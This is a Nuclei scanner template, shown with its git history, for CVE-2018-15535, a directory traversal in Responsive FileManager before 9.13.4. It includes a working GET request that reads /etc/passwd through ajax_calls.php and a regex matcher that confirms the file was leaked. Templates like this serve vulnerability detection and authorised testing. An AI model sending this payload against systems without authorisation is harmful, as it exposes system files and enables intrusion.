my-nuclei-templates/CVE-2018-15535.yaml

35 lines
1.2 KiB
YAML
Raw Normal View History

2021-09-17 06:03:58 +00:00
id: CVE-2018-15535
info:
name: Responsive FileManager < 9.13.4 - Directory Traversal
author: daffainfo
severity: high
description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal.
reference:
- https://www.exploit-db.com/exploits/45271
- https://www.cvedetails.com/cve/CVE-2018-15535
2022-06-18 08:05:25 +00:00
- http://seclists.org/fulldisclosure/2018/Aug/34
- https://www.exploit-db.com/exploits/45271/
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 7.5
2021-09-17 06:03:58 +00:00
cve-id: CVE-2018-15535
cwe-id: CWE-22
2022-06-18 08:05:25 +00:00
tags: cve,cve2018,lfi
2021-09-17 06:03:58 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-09-17 06:03:58 +00:00
- type: status
status:
- 200